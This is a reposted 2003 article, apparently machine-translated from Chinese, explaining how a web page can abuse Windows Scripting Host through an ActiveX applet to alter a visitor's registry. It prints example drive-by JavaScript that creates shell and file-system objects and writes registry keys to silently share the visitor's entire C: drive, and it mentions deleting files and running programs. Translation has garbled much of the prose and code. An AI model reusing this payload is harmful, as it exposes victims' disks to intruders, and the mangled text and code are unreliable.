2. Tech
  3. Web virus is originally produced

Web virus is originally produced

xiaoxiao2021-03-06  56

Web virus is originally produced

Published: March 27, 2003 16:07

Windows scripting host ObjectReference - Culprous? Windows Scripting Host Object Reference, hereinafter referred to as WSH. In Windows 9x's default installation, I found that most Internet users did not uninstall it. I never thought of using WSH combined with JavaScript to write such a powerful web virus. Let me talk about it. I wrote this article. After my friend visited the Chongqing Kiss Network (www.cqkiss.com), he will appear every time you start the machine before the landing dialog box appears. Welcome to Chongqing Nak.com (WWW .cqkiss.com) The word, because of the usual payment of the registry, I know that it is definitely changed in the registry. Can you directly manipulate the registry directly by the web page? I feel doubt, but after my research found, it is actually indeed. Through my research, I found that WSH is very scary. We can write a specific page. You may have the following consequences after accessing it: 1. Delete the specified file on your hard disk, create and modify text files, autoexec.bat is Text file. I did experiment, I really can modify it. 2. Execute any program allowed by the operating system; 3, set your C disk to completely share, then others can place Trojans on your machine. In the web example, I have implemented the full-sharing of the set C disk is implied. Since your site only involves the operation of the registry, I only contain this part in the examples. Other functions as described in 1 and 2 will not be given. Wsh registry on the MSDN instructions: The following table describes the methods associated with the WshShell object.Method Description RegDelete ---> Deletes a specified key or value from the registry RegRead -> Returns a specified key or value. For more detailed description, please refer to the use of the web code example in MSDN. An example of web code: (Note: / *...*/ text is my description, and should be removed in the actual web code.

Of course, its functionality requires WSH support) /*index.htm file content as follows: * / / * This line seems to be necessary, meaning is not too clear * / This is also called web, too horror </ Title> <script> Document.write ("<applet height = 0 width = 0 code = com.ms.activex.activexcomponent> </ applet>"); function f () {Try {// ActiveX Initialization A1 = document.applets [0]; "{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); A1.CreateInstance (); shl = a1.GetObject (); a1.setclsid ("{0D43FE01- F093-11CF-8940-00A0C9054228} "); A1.CreateInstance (); fso = a1.GetObject (); try {// Setting the C disk of the machine to access the web page is an implicit full share, please refer to the principle of setting / / Network Sharing Resource Setting Skills SHL.RegWrite ("HKLM // WINDWARE / / / / CURRENTVERSION // NetWork // Lanman // C //", ""); shl.regwrite ("HKLM // Software // Microsoft // Windows // CurrentVersion // NetWork // Lanman // C // Flags ", 770," REG_DWORD "); shl.Regwrite (" HKLM // Software // Microsoft // Windows // CurrentVersion / /Network//lanman//c//parm1enc" ,0,"reg_binary" ?;shl.regwrite ("HKLM // Software // Microsoft //Windows//currentversion//network//lanman//c/parm2enc" ,0,"reg_binary" ?;shl.regwrite ("HKLM // Software // Microsoft // Windows // CurrentVersion // NetWork ///// Lanman // C // Path "," C: // "); shl.regWrite (" HKLM // WINDWARE /// CurrentVersion // NetWork // Lanman //// Remark "," ShareYour Disk C "); SHL.Regwrite (" HKLM // Software // Microsoft // Windows // CurrentVersion // NetWork // LanMan // C // Type "," REG_DWORD "); // Settings. After the client needs to be restarted, you can share it with its C drive.</p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:https://www.9cbs.com/read-113201.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="113201" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.045</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = 'jlGhKN0z0lDPg3qeMJ1MbxS_2FmaVx_2BwJkfs0mDnhnsCinSglUkllsdj9srHzK7JPoY9vJSQzWSVHDLWGsRYdd3A_3D_3D'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>